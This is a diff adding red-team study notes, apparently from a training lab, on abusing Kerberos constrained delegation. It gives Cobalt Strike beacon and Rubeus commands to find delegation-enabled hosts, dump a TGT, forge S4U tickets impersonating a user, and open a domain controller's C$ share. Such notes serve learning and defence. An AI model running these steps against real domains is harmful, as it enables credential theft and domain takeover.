xenloops/Red-team-notes/15_kerberos.md

 ## Constrained Delegation

 Constrained delegation is a safer means for services to perform Kerberos delegation.
 It aims to restrict the services to which the server can act on behalf of a user.
-It no longer allows the server to cache the TGTs of other users, but allows it to request a TGS for another user with its own TGT.
+The server cannot cache the TGTs of other users, but can request a TGS for another user with its own TGT.
+Search for both user accounts as well as computer accounts doing this.

+For example: SQL-2 can act on behalf of any user to the cifs service on DC-2 (CIFS allows you to list file shares and transfer files).
+To find computers configured for constrained delegation, search for those whose  msds-allowedtodelegateto attribute is not empty: ```execute-assembly ADSearch.exe --search "(&(objectCategory=computer)(msds-allowedtodelegateto=*))" --attributes dnshostname,samaccountname,msds-allowedtodelegateto --json```

+1: To perform the delegation, get the TGT of the trusted principal; extract it with Rubeus dump:

+    beacon> run hostname
+    beacon> getuid
+    beacon> execute-assembly Rubeus.exe triage
+    beacon> execute-assembly Rubeus.exe dump /luid:0x3e4 /service:krbtgt /nowrap

+2: With the TGT, perform an S4U request to obtain a usable TGS for CIFS on DC-2.
+Want someone who is local admin on the target or a domain admin.
+This will perform an S4U2Self first and then an S4U2Proxy:

+    beacon> execute-assembly Rubeus.exe s4u /impersonateuser:<user> /msdsspn:<service> user:<delegation> ticket:<user ticket> /nowrap

+e.g.:

+    beacon> execute-assembly Rubeus.exe s4u /impersonateuser:nlamb /msdsspn:cifs/dc-2.dev.cyberbotic.io user:sql-2$ /ticket:doIFLD... /nowrap

+3: Use the final S4U2Proxy ticket for a new logon session, e.g.:

+    beacon> execute-assembly Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIGa...
+    beacon> steal_token 5540
+    beacon> ls \\dc-2.dev.cyberbotic.io\c$

+Rubeus asktgt also works if have NTLM or AES hashes.

+Always use the FQDN.
+Otherwise, there will be 1326 errors:

+    beacon> ls \\dc-2\c$
+    [-] could not open \\dc-2\c$\*: 1326 - ERROR_LOGON_FAILURE